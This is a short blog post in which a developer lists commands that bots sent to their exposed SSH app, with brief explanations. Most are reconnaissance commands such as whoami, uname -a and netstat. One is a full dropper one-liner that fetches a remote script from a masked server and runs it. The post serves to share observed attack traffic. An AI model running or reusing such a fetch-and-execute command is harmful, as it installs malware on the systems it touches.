️Hiroshi Takeuchi 📟
Here is what happened when I expose my SSH app

Here is what happened when I expose my SSH app


SSH

As I wrote in the previous post, now I have an SSH app that’s been running for a month. The good thing is, I have lots of visitors to it. And the bad thing is - unfortunately none of them is an actual user🥲

My SSH app is under attack.

It’s no problem. The app talks in SSH protocol over the network - but it doesn’t allow attackers to gain the actual shell at all. (The app is run on a distroless image container that has minimum security vulnerability exposure)

Messages I Got

So what does the attacks look like? Let me share some of the hello messages I received.

echo IoT_ACCESS_VERIFIED

This is the message I’ve received the most. What does this even mean? Well, it just display IoT_ACCESS_VERIFIED literaly, only when on success. As you may realized this is probably sent by bots. And when they the messsage from a server the bot will tell its owner it found a new target. Is this a defacto-standard echo command in the bot comminuty? Or there might be a well-known program written for this purpose in Go.

The list has many messages that have similar purpose:

whoami
true
pwd
hostnmae

Let’s see what other messages look like:

uname -s -m
uname -a

I haven’t used uname personally. The command is used to identify the OS and CPU architecture as well as their version. It should be used to find out vulnerable servers with obsolate OS version on the internet I guess. It’s a bit scary thinking about having a website been unmaintained for years…


mount | head - 5

This lists devices currently mounted on the serever you’re in. Why this command? No idea. 

netstat -tulpn 2>/dev/null | grep LISTEN | head -20

This one linear will display the first 20 port number listening on. Cool.


cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm sMLuxc.sh;wget http://<server_name>/sMLuxc.sh || curl -O http://<server_name>/sMLuxc.sh || /bin/busybox wget http://<server_name>/sMLuxc.sh; chmod 777 sMLuxc.sh;./sMLuxc.sh

This one is the most aggresive one I have received. It downloads a mallicious script and run it. Interesting… (I masked the IP address to the site so that no one accidentally visit the site.)

One More Thing

They come to my app all the way down from all over the world at least. So I would like to show them the following code as a welcome message😊

aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kRlVsQVFaQjlOZwo=

It should be too easy for them. But I hope they like it😉

© 2025 Hiro